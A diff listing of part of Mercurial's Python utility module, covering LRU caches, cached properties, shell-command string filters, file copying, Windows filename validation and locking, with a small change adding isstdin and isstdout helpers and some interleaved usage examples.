952 952 >>> b is c
953 953 False
954 954 >>> b is b.preparewrite()
955 955 True
956 956 """
957 957
958 958 class cowsortdict(cow, sortdict):
959 959 """copy-on-write sortdict
960 960
961 961 Be sure to call d = d.preparewrite() before writing to d.
962 962 """
963 963
964 964 class transactional(object):
965 965 """Base class for making a transactional type into a context manager."""
966 966 __metaclass__ = abc.ABCMeta
967 967
968 968 @abc.abstractmethod
969 969 def close(self):
970 970 """Successfully closes the transaction."""
971 971
972 972 @abc.abstractmethod
973 973 def release(self):
974 974 """Marks the end of the transaction.
975 975
976 976 If the transaction has not been closed, it will be aborted.
977 977 """
978 978
979 979 def __enter__(self):
980 980 return self
981 981
982 982 def __exit__(self, exc_type, exc_val, exc_tb):
983 983 try:
984 984 if exc_type is None:
985 985 self.close()
986 986 finally:
987 987 self.release()
988 988
989 989 @contextlib.contextmanager
990 990 def acceptintervention(tr=None):
991 991 """A context manager that closes the transaction on InterventionRequired
992 992
993 993 If no transaction was provided, this simply runs the body and returns.
994 994 """
995 995 if not tr:
996 996 yield
997 997 return
998 998 try:
999 999 yield
1000 1000 tr.close()
1001 1001 except error.InterventionRequired:
1002 1002 tr.close()
1003 1003 raise
1004 1004 finally:
1005 1005 tr.release()
1006 1006
1007 1007 @contextlib.contextmanager
1008 1008 def nullcontextmanager():
1009 1009 yield
1010 1010
1011 1011 class _lrucachenode(object):
1012 1012 """A node in a doubly linked list.
1013 1013
1014 1014 Holds a reference to nodes on either side as well as a key-value
1015 1015 pair for the dictionary entry.
1016 1016 """
1017 1017 __slots__ = (u'next', u'prev', u'key', u'value')
1018 1018
1019 1019 def __init__(self):
1020 1020 self.next = None
1021 1021 self.prev = None
1022 1022
1023 1023 self.key = _notset
1024 1024 self.value = None
1025 1025
1026 1026 def markempty(self):
1027 1027 """Mark the node as emptied."""
1028 1028 self.key = _notset
1029 1029
1030 1030 class lrucachedict(object):
1031 1031 """Dict that caches most recent accesses and sets.
1032 1032
1033 1033 The dict consists of an actual backing dict - indexed by original
1034 1034 key - and a doubly linked circular list defining the order of entries in
1035 1035 the cache.
1036 1036
1037 1037 The head node is the newest entry in the cache. If the cache is full,
1038 1038 we recycle head.prev and make it the new head. Cache accesses result in
1039 1039 the node being moved to before the existing head and being marked as the
1040 1040 new head node.
1041 1041 """
1042 1042 def __init__(self, max):
1043 1043 self._cache = {}
1044 1044
1045 1045 self._head = head = _lrucachenode()
1046 1046 head.prev = head
1047 1047 head.next = head
1048 1048 self._size = 1
1049 1049 self._capacity = max
1050 1050
1051 1051 def __len__(self):
1052 1052 return len(self._cache)
1053 1053
1054 1054 def __contains__(self, k):
1055 1055 return k in self._cache
1056 1056
1057 1057 def __iter__(self):
1058 1058 # We don't have to iterate in cache order, but why not.
1059 1059 n = self._head
1060 1060 for i in range(len(self._cache)):
1061 1061 yield n.key
1062 1062 n = n.next
1063 1063
1064 1064 def __getitem__(self, k):
1065 1065 node = self._cache[k]
1066 1066 self._movetohead(node)
1067 1067 return node.value
1068 1068
1069 1069 def __setitem__(self, k, v):
1070 1070 node = self._cache.get(k)
1071 1071 # Replace existing value and mark as newest.
1072 1072 if node is not None:
1073 1073 node.value = v
1074 1074 self._movetohead(node)
1075 1075 return
1076 1076
1077 1077 if self._size < self._capacity:
1078 1078 node = self._addcapacity()
1079 1079 else:
1080 1080 # Grab the last/oldest item.
1081 1081 node = self._head.prev
1082 1082
1083 1083 # At capacity. Kill the old entry.
1084 1084 if node.key is not _notset:
1085 1085 del self._cache[node.key]
1086 1086
1087 1087 node.key = k
1088 1088 node.value = v
1089 1089 self._cache[k] = node
1090 1090 # And mark it as newest entry. No need to adjust order since it
1091 1091 # is already self._head.prev.
1092 1092 self._head = node
1093 1093
1094 1094 def __delitem__(self, k):
1095 1095 node = self._cache.pop(k)
1096 1096 node.markempty()
1097 1097
1098 1098 # Temporarily mark as newest item before re-adjusting head to make
1099 1099 # this node the oldest item.
1100 1100 self._movetohead(node)
1101 1101 self._head = node.next
1102 1102
1103 1103 # Additional dict methods.
1104 1104
1105 1105 def get(self, k, default=None):
1106 1106 try:
1107 1107 return self._cache[k].value
1108 1108 except KeyError:
1109 1109 return default
1110 1110
1111 1111 def clear(self):
1112 1112 n = self._head
1113 1113 while n.key is not _notset:
1114 1114 n.markempty()
1115 1115 n = n.next
1116 1116
1117 1117 self._cache.clear()
1118 1118
1119 1119 def copy(self):
1120 1120 result = lrucachedict(self._capacity)
1121 1121 n = self._head.prev
1122 1122 # Iterate in oldest-to-newest order, so the copy has the right ordering
1123 1123 for i in range(len(self._cache)):
1124 1124 result[n.key] = n.value
1125 1125 n = n.prev
1126 1126 return result
1127 1127
1128 1128 def _movetohead(self, node):
1129 1129 """Mark a node as the newest, making it the new head.
1130 1130
1131 1131 When a node is accessed, it becomes the freshest entry in the LRU
1132 1132 list, which is denoted by self._head.
1133 1133
1134 1134 Visually, let's make ``N`` the new head node (* denotes head):
1135 1135
1136 1136 previous/oldest <-> head <-> next/next newest
1137 1137
1138 1138 ----<->--- A* ---<->-----
1139 1139 | |
1140 1140 E <-> D <-> N <-> C <-> B
1141 1141
1142 1142 To:
1143 1143
1144 1144 ----<->--- N* ---<->-----
1145 1145 | |
1146 1146 E <-> D <-> C <-> B <-> A
1147 1147
1148 1148 This requires the following moves:
1149 1149
1150 1150 C.next = D (node.prev.next = node.next)
1151 1151 D.prev = C (node.next.prev = node.prev)
1152 1152 E.next = N (head.prev.next = node)
1153 1153 N.prev = E (node.prev = head.prev)
1154 1154 N.next = A (node.next = head)
1155 1155 A.prev = N (head.prev = node)
1156 1156 """
1157 1157 head = self._head
1158 1158 # C.next = D
1159 1159 node.prev.next = node.next
1160 1160 # D.prev = C
1161 1161 node.next.prev = node.prev
1162 1162 # N.prev = E
1163 1163 node.prev = head.prev
1164 1164 # N.next = A
1165 1165 # It is tempting to do just "head" here; however, if node is
1166 1166 # adjacent to head, this will do bad things.
1167 1167 node.next = head.prev.next
1168 1168 # E.next = N
1169 1169 node.next.prev = node
1170 1170 # A.prev = N
1171 1171 node.prev.next = node
1172 1172
1173 1173 self._head = node
1174 1174
1175 1175 def _addcapacity(self):
1176 1176 """Add a node to the circular linked list.
1177 1177
1178 1178 The new node is inserted before the head node.
1179 1179 """
1180 1180 head = self._head
1181 1181 node = _lrucachenode()
1182 1182 head.prev.next = node
1183 1183 node.prev = head.prev
1184 1184 node.next = head
1185 1185 head.prev = node
1186 1186 self._size += 1
1187 1187 return node
1188 1188
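
A short illustration of the recycling order with a capacity of two:

    d = lrucachedict(2)
    d['a'] = 1
    d['b'] = 2
    d['a']                    # touching 'a' leaves 'b' as the oldest entry
    d['c'] = 3                # at capacity: 'b' is recycled, 'a' survives
    assert 'a' in d and 'c' in d and 'b' not in d
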
1189 1189 def lrucachefunc(func):
1190 1190 '''cache most recent results of function calls'''
1191 1191 cache = {}
1192 1192 order = collections.deque()
1193 1193 if func.__code__.co_argcount == 1:
1194 1194 def f(arg):
1195 1195 if arg not in cache:
1196 1196 if len(cache) > 20:
1197 1197 del cache[order.popleft()]
1198 1198 cache[arg] = func(arg)
1199 1199 else:
1200 1200 order.remove(arg)
1201 1201 order.append(arg)
1202 1202 return cache[arg]
1203 1203 else:
1204 1204 def f(*args):
1205 1205 if args not in cache:
1206 1206 if len(cache) > 20:
1207 1207 del cache[order.popleft()]
1208 1208 cache[args] = func(*args)
1209 1209 else:
1210 1210 order.remove(args)
1211 1211 order.append(args)
1212 1212 return cache[args]
1213 1213
1214 1214 return f
1215 1215
1216 1216 class propertycache(object):
1217 1217 def __init__(self, func):
1218 1218 self.func = func
1219 1219 self.name = func.__name__
1220 1220 def __get__(self, obj, type=None):
1221 1221 result = self.func(obj)
1222 1222 self.cachevalue(obj, result)
1223 1223 return result
1224 1224
1225 1225 def cachevalue(self, obj, value):
1226 1226 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1227 1227 obj.__dict__[self.name] = value
1228 1228
1229 1229 def clearcachedproperty(obj, prop):
1230 1230 '''clear a cached property value, if one has been set'''
1231 1231 if prop in obj.__dict__:
1232 1232 del obj.__dict__[prop]
1233 1233
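
A minimal sketch of both helpers (the class and attribute names are illustrative):

    class config(object):
        @propertycache
        def expensive(self):
            return 42                 # pretend this is costly to compute

    c = config()
    c.expensive                       # first access runs the function
    c.expensive                       # now served straight from c.__dict__
    clearcachedproperty(c, 'expensive')   # the next access recomputes
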
1234 1234 def pipefilter(s, cmd):
1235 1235 '''filter string S through command CMD, returning its output'''
1236 1236 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1237 1237 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1238 1238 pout, perr = p.communicate(s)
1239 1239 return pout
1240 1240
1241 1241 def tempfilter(s, cmd):
1242 1242 '''filter string S through a pair of temporary files with CMD.
1243 1243 CMD is used as a template to create the real command to be run,
1244 1244 with the strings INFILE and OUTFILE replaced by the real names of
1245 1245 the temporary files generated.'''
1246 1246 inname, outname = None, None
1247 1247 try:
1248 1248 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1249 1249 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1250 1250 fp.write(s)
1251 1251 fp.close()
1252 1252 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1253 1253 os.close(outfd)
1254 1254 cmd = cmd.replace('INFILE', inname)
1255 1255 cmd = cmd.replace('OUTFILE', outname)
1256 1256 code = os.system(cmd)
1257 1257 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1258 1258 code = 0
1259 1259 if code:
1260 1260 raise Abort(_("command '%s' failed: %s") %
1261 1261 (cmd, explainexit(code)))
1262 1262 return readfile(outname)
1263 1263 finally:
1264 1264 try:
1265 1265 if inname:
1266 1266 os.unlink(inname)
1267 1267 except OSError:
1268 1268 pass
1269 1269 try:
1270 1270 if outname:
1271 1271 os.unlink(outname)
1272 1272 except OSError:
1273 1273 pass
1274 1274
1275 1275 filtertable = {
1276 1276 'tempfile:': tempfilter,
1277 1277 'pipe:': pipefilter,
1278 1278 }
1279 1279
1280 1280 def filter(s, cmd):
1281 1281 "filter a string through a command that transforms its input to its output"
1282 1282 for name, fn in filtertable.iteritems():
1283 1283 if cmd.startswith(name):
1284 1284 return fn(s, cmd[len(name):].lstrip())
1285 1285 return pipefilter(s, cmd)
1286 1286
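
For example, on a POSIX system (tr is a stand-in for any filter command):

    filter('hello\n', 'pipe: tr a-z A-Z')
    # tempfile: substitutes the generated temp file names for INFILE/OUTFILE
    filter('hello\n', 'tempfile: tr a-z A-Z < INFILE > OUTFILE')
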
1287 1287 def binary(s):
1288 1288 """return true if a string is binary data"""
1289 1289 return bool(s and '\0' in s)
1290 1290
1291 1291 def increasingchunks(source, min=1024, max=65536):
1292 1292 '''return no less than min bytes per chunk while data remains,
1293 1293 doubling min after each chunk until it reaches max'''
1294 1294 def log2(x):
1295 1295 if not x:
1296 1296 return 0
1297 1297 i = 0
1298 1298 while x:
1299 1299 x >>= 1
1300 1300 i += 1
1301 1301 return i - 1
1302 1302
1303 1303 buf = []
1304 1304 blen = 0
1305 1305 for chunk in source:
1306 1306 buf.append(chunk)
1307 1307 blen += len(chunk)
1308 1308 if blen >= min:
1309 1309 if min < max:
1310 1310 min = min << 1
1311 1311 nmin = 1 << log2(blen)
1312 1312 if nmin > min:
1313 1313 min = nmin
1314 1314 if min > max:
1315 1315 min = max
1316 1316 yield ''.join(buf)
1317 1317 blen = 0
1318 1318 buf = []
1319 1319 if buf:
1320 1320 yield ''.join(buf)
1321 1321
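
For instance, feeding sixteen 1 KiB pieces yields chunks that double up to max, with the final partial buffer flushed at the end (a Python 2 flavored sketch, since the joins above use str):

    source = ('x' * 1024 for _ in range(16))
    sizes = [len(c) for c in increasingchunks(source, min=1024, max=8192)]
    assert sizes == [1024, 2048, 4096, 8192, 1024]
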
1322 1322 Abort = error.Abort
1323 1323
1324 1324 def always(fn):
1325 1325 return True
1326 1326
1327 1327 def never(fn):
1328 1328 return False
1329 1329
1330 1330 def nogc(func):
1331 1331 """disable garbage collector
1332 1332
1333 1333 Python's garbage collector triggers a GC each time a certain number of
1334 1334 container objects (the number being defined by gc.get_threshold()) are
1335 1335 allocated even when marked not to be tracked by the collector. Tracking has
1336 1336 no effect on when GCs are triggered, only on what objects the GC looks
1337 1337 into. As a workaround, disable GC while building complex (huge)
1338 1338 containers.
1339 1339
1340 1340 This garbage collector issue has been fixed in 2.7, but it still affects
1341 1341 CPython's performance.
1342 1342 """
1343 1343 def wrapper(*args, **kwargs):
1344 1344 gcenabled = gc.isenabled()
1345 1345 gc.disable()
1346 1346 try:
1347 1347 return func(*args, **kwargs)
1348 1348 finally:
1349 1349 if gcenabled:
1350 1350 gc.enable()
1351 1351 return wrapper
1352 1352
1353 1353 if pycompat.ispypy:
1354 1354 # PyPy runs slower with gc disabled
1355 1355 nogc = lambda x: x
1356 1356
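
For example (the function body is arbitrary):

    @nogc
    def buildindex(entries):
        # build a huge container without GC pauses triggered by the
        # allocation of many tracked objects
        return dict(entries)

    buildindex((i, str(i)) for i in range(100000))
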
1357 1357 def pathto(root, n1, n2):
1358 1358 '''return the relative path from one place to another.
1359 1359 root should use os.sep to separate directories
1360 1360 n1 should use os.sep to separate directories
1361 1361 n2 should use "/" to separate directories
1362 1362 returns an os.sep-separated path.
1363 1363
1364 1364 If n1 is a relative path, it is assumed to be
1365 1365 relative to root.
1366 1366 n2 should always be relative to root.
1367 1367 '''
1368 1368 if not n1:
1369 1369 return localpath(n2)
1370 1370 if os.path.isabs(n1):
1371 1371 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1372 1372 return os.path.join(root, localpath(n2))
1373 1373 n2 = '/'.join((pconvert(root), n2))
1374 1374 a, b = splitpath(n1), n2.split('/')
1375 1375 a.reverse()
1376 1376 b.reverse()
1377 1377 while a and b and a[-1] == b[-1]:
1378 1378 a.pop()
1379 1379 b.pop()
1380 1380 b.reverse()
1381 1381 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1382 1382
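
For example, on POSIX (the paths are illustrative):

    # from the directory /repo/a/b to the repo-relative file a/c/f
    pathto('/repo', '/repo/a/b', 'a/c/f')    # -> '../c/f'
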
1383 1383 def mainfrozen():
1384 1384 """return True if we are a frozen executable.
1385 1385
1386 1386 The code supports py2exe (most common, Windows only) and tools/freeze
1387 1387 (portable, not much used).
1388 1388 """
1389 1389 return (safehasattr(sys, "frozen") or # new py2exe
1390 1390 safehasattr(sys, "importers") or # old py2exe
1391 1391 imp.is_frozen(u"__main__")) # tools/freeze
1392 1392
1393 1393 # the location of data files matching the source code
1394 1394 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1395 1395 # executable version (py2exe) doesn't support __file__
1396 1396 datapath = os.path.dirname(pycompat.sysexecutable)
1397 1397 else:
1398 1398 datapath = os.path.dirname(pycompat.fsencode(__file__))
1399 1399
1400 1400 i18n.setdatapath(datapath)
1401 1401
1402 1402 _hgexecutable = None
1403 1403
1404 1404 def hgexecutable():
1405 1405 """return location of the 'hg' executable.
1406 1406
1407 1407 Defaults to $HG or 'hg' in the search path.
1408 1408 """
1409 1409 if _hgexecutable is None:
1410 1410 hg = encoding.environ.get('HG')
1411 1411 mainmod = sys.modules[pycompat.sysstr('__main__')]
1412 1412 if hg:
1413 1413 _sethgexecutable(hg)
1414 1414 elif mainfrozen():
1415 1415 if getattr(sys, 'frozen', None) == 'macosx_app':
1416 1416 # Env variable set by py2app
1417 1417 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1418 1418 else:
1419 1419 _sethgexecutable(pycompat.sysexecutable)
1420 1420 elif (os.path.basename(
1421 1421 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1422 1422 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1423 1423 else:
1424 1424 exe = findexe('hg') or os.path.basename(sys.argv[0])
1425 1425 _sethgexecutable(exe)
1426 1426 return _hgexecutable
1427 1427
1428 1428 def _sethgexecutable(path):
1429 1429 """set location of the 'hg' executable"""
1430 1430 global _hgexecutable
1431 1431 _hgexecutable = path
1432 1432
1433 def _isstdout(f):
1433 def _testfileno(f, stdf):
1434 1434 fileno = getattr(f, 'fileno', None)
1435 1435 try:
1436 return fileno and fileno() == sys.__stdout__.fileno()
1436 return fileno and fileno() == stdf.fileno()
1437 1437 except io.UnsupportedOperation:
1438 1438 return False # fileno() raised UnsupportedOperation
1439 1439
1440 def isstdin(f):
1441 return _testfileno(f, sys.__stdin__)
1442
1443 def isstdout(f):
1444 return _testfileno(f, sys.__stdout__)
1445
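
A quick sketch of the new public helpers; note that objects without a usable fileno(), such as stringio instances, compare falsy rather than raising:

    import sys

    isstdout(sys.__stdout__)    # True: fileno() matches sys.__stdout__
    isstdin(sys.__stdin__)      # True, by the same test against __stdin__
    isstdout(stringio())        # falsy: no usable fileno()
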
1440 1446 def shellenviron(environ=None):
1441 1447 """return environ with optional override, useful for shelling out"""
1442 1448 def py2shell(val):
1443 1449 'convert python object into string that is useful to shell'
1444 1450 if val is None or val is False:
1445 1451 return '0'
1446 1452 if val is True:
1447 1453 return '1'
1448 1454 return pycompat.bytestr(val)
1449 1455 env = dict(encoding.environ)
1450 1456 if environ:
1451 1457 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1452 1458 env['HG'] = hgexecutable()
1453 1459 return env
1454 1460
1455 1461 def system(cmd, environ=None, cwd=None, out=None):
1456 1462 '''enhanced shell command execution.
1457 1463 run with environment maybe modified, maybe in different dir.
1458 1464
1459 1465 if out is specified, it is assumed to be a file-like object that has a
1460 1466 write() method. stdout and stderr will be redirected to out.'''
1461 1467 try:
1462 1468 stdout.flush()
1463 1469 except Exception:
1464 1470 pass
1465 1471 cmd = quotecommand(cmd)
1466 1472 env = shellenviron(environ)
1467 if out is None or _isstdout(out):
1473 if out is None or isstdout(out):
1468 1474 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1469 1475 env=env, cwd=cwd)
1470 1476 else:
1471 1477 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1472 1478 env=env, cwd=cwd, stdout=subprocess.PIPE,
1473 1479 stderr=subprocess.STDOUT)
1474 1480 for line in iter(proc.stdout.readline, ''):
1475 1481 out.write(line)
1476 1482 proc.wait()
1477 1483 rc = proc.returncode
1478 1484 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1479 1485 rc = 0
1480 1486 return rc
1481 1487
1482 1488 def checksignature(func):
1483 1489 '''wrap a function with code to check for calling errors'''
1484 1490 def check(*args, **kwargs):
1485 1491 try:
1486 1492 return func(*args, **kwargs)
1487 1493 except TypeError:
1488 1494 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1489 1495 raise error.SignatureError
1490 1496 raise
1491 1497
1492 1498 return check
1493 1499
1494 1500 # a whitelist of known filesystems where hardlinks work reliably
1495 1501 _hardlinkfswhitelist = {
1496 1502 'btrfs',
1497 1503 'ext2',
1498 1504 'ext3',
1499 1505 'ext4',
1500 1506 'hfs',
1501 1507 'jfs',
1502 1508 'NTFS',
1503 1509 'reiserfs',
1504 1510 'tmpfs',
1505 1511 'ufs',
1506 1512 'xfs',
1507 1513 'zfs',
1508 1514 }
1509 1515
1510 1516 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1511 1517 '''copy a file, preserving mode and optionally other stat info like
1512 1518 atime/mtime
1513 1519
1514 1520 checkambig argument is used with filestat, and is useful only if
1515 1521 destination file is guarded by any lock (e.g. repo.lock or
1516 1522 repo.wlock).
1517 1523
1518 1524 copystat and checkambig should be exclusive.
1519 1525 '''
1520 1526 assert not (copystat and checkambig)
1521 1527 oldstat = None
1522 1528 if os.path.lexists(dest):
1523 1529 if checkambig:
1524 1530 oldstat = checkambig and filestat.frompath(dest)
1525 1531 unlink(dest)
1526 1532 if hardlink:
1527 1533 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1528 1534 # unless we are confident that dest is on a whitelisted filesystem.
1529 1535 try:
1530 1536 fstype = getfstype(os.path.dirname(dest))
1531 1537 except OSError:
1532 1538 fstype = None
1533 1539 if fstype not in _hardlinkfswhitelist:
1534 1540 hardlink = False
1535 1541 if hardlink:
1536 1542 try:
1537 1543 oslink(src, dest)
1538 1544 return
1539 1545 except (IOError, OSError):
1540 1546 pass # fall back to normal copy
1541 1547 if os.path.islink(src):
1542 1548 os.symlink(os.readlink(src), dest)
1543 1549 # copytime is ignored for symlinks, but in general copytime isn't needed
1544 1550 # for them anyway
1545 1551 else:
1546 1552 try:
1547 1553 shutil.copyfile(src, dest)
1548 1554 if copystat:
1549 1555 # copystat also copies mode
1550 1556 shutil.copystat(src, dest)
1551 1557 else:
1552 1558 shutil.copymode(src, dest)
1553 1559 if oldstat and oldstat.stat:
1554 1560 newstat = filestat.frompath(dest)
1555 1561 if newstat.isambig(oldstat):
1556 1562 # stat of copied file is ambiguous to original one
1557 1563 advanced = (
1558 1564 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1559 1565 os.utime(dest, (advanced, advanced))
1560 1566 except shutil.Error as inst:
1561 1567 raise Abort(str(inst))
1562 1568
1563 1569 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1564 1570 """Copy a directory tree using hardlinks if possible."""
1565 1571 num = 0
1566 1572
1567 1573 gettopic = lambda: hardlink and _('linking') or _('copying')
1568 1574
1569 1575 if os.path.isdir(src):
1570 1576 if hardlink is None:
1571 1577 hardlink = (os.stat(src).st_dev ==
1572 1578 os.stat(os.path.dirname(dst)).st_dev)
1573 1579 topic = gettopic()
1574 1580 os.mkdir(dst)
1575 1581 for name, kind in listdir(src):
1576 1582 srcname = os.path.join(src, name)
1577 1583 dstname = os.path.join(dst, name)
1578 1584 def nprog(t, pos):
1579 1585 if pos is not None:
1580 1586 return progress(t, pos + num)
1581 1587 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1582 1588 num += n
1583 1589 else:
1584 1590 if hardlink is None:
1585 1591 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1586 1592 os.stat(os.path.dirname(dst)).st_dev)
1587 1593 topic = gettopic()
1588 1594
1589 1595 if hardlink:
1590 1596 try:
1591 1597 oslink(src, dst)
1592 1598 except (IOError, OSError):
1593 1599 hardlink = False
1594 1600 shutil.copy(src, dst)
1595 1601 else:
1596 1602 shutil.copy(src, dst)
1597 1603 num += 1
1598 1604 progress(topic, num)
1599 1605 progress(topic, None)
1600 1606
1601 1607 return hardlink, num
1602 1608
1603 1609 _winreservednames = {
1604 1610 'con', 'prn', 'aux', 'nul',
1605 1611 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1606 1612 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1607 1613 }
1608 1614 _winreservedchars = ':*?"<>|'
1609 1615 def checkwinfilename(path):
1610 1616 r'''Check that the base-relative path is a valid filename on Windows.
1611 1617 Returns None if the path is ok, or a UI string describing the problem.
1612 1618
1613 1619 >>> checkwinfilename(b"just/a/normal/path")
1614 1620 >>> checkwinfilename(b"foo/bar/con.xml")
1615 1621 "filename contains 'con', which is reserved on Windows"
1616 1622 >>> checkwinfilename(b"foo/con.xml/bar")
1617 1623 "filename contains 'con', which is reserved on Windows"
1618 1624 >>> checkwinfilename(b"foo/bar/xml.con")
1619 1625 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1620 1626 "filename contains 'AUX', which is reserved on Windows"
1621 1627 >>> checkwinfilename(b"foo/bar/bla:.txt")
1622 1628 "filename contains ':', which is reserved on Windows"
1623 1629 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1624 1630 "filename contains '\\x07', which is invalid on Windows"
1625 1631 >>> checkwinfilename(b"foo/bar/bla ")
1626 1632 "filename ends with ' ', which is not allowed on Windows"
1627 1633 >>> checkwinfilename(b"../bar")
1628 1634 >>> checkwinfilename(b"foo\\")
1629 1635 "filename ends with '\\', which is invalid on Windows"
1630 1636 >>> checkwinfilename(b"foo\\/bar")
1631 1637 "directory name ends with '\\', which is invalid on Windows"
1632 1638 '''
1633 1639 if path.endswith('\\'):
1634 1640 return _("filename ends with '\\', which is invalid on Windows")
1635 1641 if '\\/' in path:
1636 1642 return _("directory name ends with '\\', which is invalid on Windows")
1637 1643 for n in path.replace('\\', '/').split('/'):
1638 1644 if not n:
1639 1645 continue
1640 1646 for c in _filenamebytestr(n):
1641 1647 if c in _winreservedchars:
1642 1648 return _("filename contains '%s', which is reserved "
1643 1649 "on Windows") % c
1644 1650 if ord(c) <= 31:
1645 1651 return _("filename contains '%s', which is invalid "
1646 1652 "on Windows") % escapestr(c)
1647 1653 base = n.split('.')[0]
1648 1654 if base and base.lower() in _winreservednames:
1649 1655 return _("filename contains '%s', which is reserved "
1650 1656 "on Windows") % base
1651 1657 t = n[-1:]
1652 1658 if t in '. ' and n not in '..':
1653 1659 return _("filename ends with '%s', which is not allowed "
1654 1660 "on Windows") % t
1655 1661
1656 1662 if pycompat.iswindows:
1657 1663 checkosfilename = checkwinfilename
1658 1664 timer = time.clock
1659 1665 else:
1660 1666 checkosfilename = platform.checkosfilename
1661 1667 timer = time.time
1662 1668
1663 1669 if safehasattr(time, "perf_counter"):
1664 1670 timer = time.perf_counter
1665 1671
1666 1672 def makelock(info, pathname):
1667 1673 """Create a lock file atomically if possible
1668 1674
1669 1675 This may leave a stale lock file if symlink isn't supported and signal
1670 1676 interrupt is enabled.
1671 1677 """
1672 1678 try:
1673 1679 return os.symlink(info, pathname)
1674 1680 except OSError as why:
1675 1681 if why.errno == errno.EEXIST:
1676 1682 raise
1677 1683 except AttributeError: # no symlink in os
1678 1684 pass
1679 1685
1680 1686 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1681 1687 ld = os.open(pathname, flags)
1682 1688 os.write(ld, info)
1683 1689 os.close(ld)
1684 1690
1685 1691 def readlock(pathname):
1686 1692 try:
1687 1693 return os.readlink(pathname)
1688 1694 except OSError as why:
1689 1695 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1690 1696 raise
1691 1697 except AttributeError: # no symlink in os
1692 1698 pass
1693 1699 fp = posixfile(pathname, 'rb')
1694 1700 r = fp.read()
1695 1701 fp.close()
1696 1702 return r
1697 1703
1698 1704 def fstat(fp):
1699 1705 '''stat file object that may not have fileno method.'''
1700 1706 try:
1701 1707 return os.fstat(fp.fileno())
1702 1708 except AttributeError:
1703 1709 return os.stat(fp.name)
1704 1710
1705 1711 # File system features
1706 1712
1707 1713 def fscasesensitive(path):
1708 1714 """
1709 1715 Return true if the given path is on a case-sensitive filesystem
1710 1716
1711 1717 Requires a path (like /foo/.hg) ending with a foldable final
1712 1718 directory component.
1713 1719 """
1714 1720 s1 = os.lstat(path)
1715 1721 d, b = os.path.split(path)
1716 1722 b2 = b.upper()
1717 1723 if b == b2:
1718 1724 b2 = b.lower()
1719 1725 if b == b2:
1720 1726 return True # no evidence against case sensitivity
1721 1727 p2 = os.path.join(d, b2)
1722 1728 try:
1723 1729 s2 = os.lstat(p2)
1724 1730 if s2 == s1:
1725 1731 return False
1726 1732 return True
1727 1733 except OSError:
1728 1734 return True
1729 1735
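# Example sketch (illustrative; the answer depends on the underlying
# filesystem, so this cannot be a doctest):
#
#   fscasesensitive(b'/repo/.hg')  # typically True on ext4, False on
#                                  # NTFS/APFS with default settings
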
1730 1736 try:
1731 1737 import re2
1732 1738 _re2 = None
1733 1739 except ImportError:
1734 1740 _re2 = False
1735 1741
1736 1742 class _re(object):
1737 1743 def _checkre2(self):
1738 1744 global _re2
1739 1745 try:
1740 1746 # check if match works, see issue3964
1741 1747 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1742 1748 except ImportError:
1743 1749 _re2 = False
1744 1750
1745 1751 def compile(self, pat, flags=0):
1746 1752 '''Compile a regular expression, using re2 if possible
1747 1753
1748 1754 For best performance, use only re2-compatible regexp features. The
1749 1755 only flags from the re module that are re2-compatible are
1750 1756 IGNORECASE and MULTILINE.'''
1751 1757 if _re2 is None:
1752 1758 self._checkre2()
1753 1759 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1754 1760 if flags & remod.IGNORECASE:
1755 1761 pat = '(?i)' + pat
1756 1762 if flags & remod.MULTILINE:
1757 1763 pat = '(?m)' + pat
1758 1764 try:
1759 1765 return re2.compile(pat)
1760 1766 except re2.error:
1761 1767 pass
1762 1768 return remod.compile(pat, flags)
1763 1769
1764 1770 @propertycache
1765 1771 def escape(self):
1766 1772 '''Return the version of escape corresponding to self.compile.
1767 1773
1768 1774 This is imperfect because whether re2 or re is used for a particular
1769 1775 function depends on the flags, etc, but it's the best we can do.
1770 1776 '''
1771 1777 global _re2
1772 1778 if _re2 is None:
1773 1779 self._checkre2()
1774 1780 if _re2:
1775 1781 return re2.escape
1776 1782 else:
1777 1783 return remod.escape
1778 1784
1779 1785 re = _re()
1780 1786
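# Example (illustrative): util.re.compile() prefers re2 when it is
# importable and the flags are supported, else falls back to remod:
#
#   matcher = re.compile(br'(?:^|/)\.hg(?:/|$)', remod.IGNORECASE)
#   bool(matcher.search(b'foo/.HG/store'))   # -> True with either engine
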
1781 1787 _fspathcache = {}
1782 1788 def fspath(name, root):
1783 1789 '''Get name in the case stored in the filesystem
1784 1790
1785 1791 The name should be relative to root, and be normcase-ed for efficiency.
1786 1792
1787 1793 Note that this function is unnecessary, and should not be
1788 1794 called, for case-sensitive filesystems (simply because it's expensive).
1789 1795
1790 1796 The root should be normcase-ed, too.
1791 1797 '''
1792 1798 def _makefspathcacheentry(dir):
1793 1799 return dict((normcase(n), n) for n in os.listdir(dir))
1794 1800
1795 1801 seps = pycompat.ossep
